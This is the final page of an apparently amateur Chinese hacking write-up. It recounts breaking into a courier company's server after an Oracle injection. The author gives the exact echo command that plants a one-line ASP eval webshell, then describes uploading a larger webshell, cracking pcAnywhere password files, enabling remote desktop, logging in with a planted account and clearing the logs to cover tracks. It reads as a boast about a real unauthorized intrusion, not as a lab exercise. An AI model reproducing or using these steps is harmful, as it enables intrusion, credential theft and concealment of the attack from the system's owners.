对著名快递公司的一次艰难的oracle注入

●柳暗花明：

shell里执行
rundll32.exe user.exe,restartwindows,不一会主机重启了，成功telnet，这样权限我们已经拿到了！但是要向图像界面进军，在telnet执行netstat -an看了下端口，发现5632，熟悉提权的人应该很熟悉，这是pcanywhere的默认端口，但是怎么才能知道pcanywhere的密码呢？因为不能连接外网，所以直接传cif文件是不可能的，于是想到了webshell！在telnet里找到站的 目录d:\site,执行

以下是引用片段： echo "<%eval(request("#"))%>" >d:\site\guestboook.asp

访问成功，然后用海洋一句话提交大马成功如图：



跳转到pcanywhere的cif文件目录下载cif文件并破解，成功得到pcanywhere的密码，如图：



到这基本就结束了，但是pcanywhere远程很不爽，于是还是想开用3389，于是百度搜索原因，发现是3389和pcanywhere冲突的原因并找到了解决办法，删除某个注册表项就搞定了，在pcanywhere操作就很简单了，搞定后重启服务器，连接对方3389，终于看到了熟悉的登录界面，用前面建的用户成功登入！如图：



至此整个入侵过程宣告结束！清了下日志修补了下漏洞！闪人！睡觉！

上一页  [1] [2] [3] [4]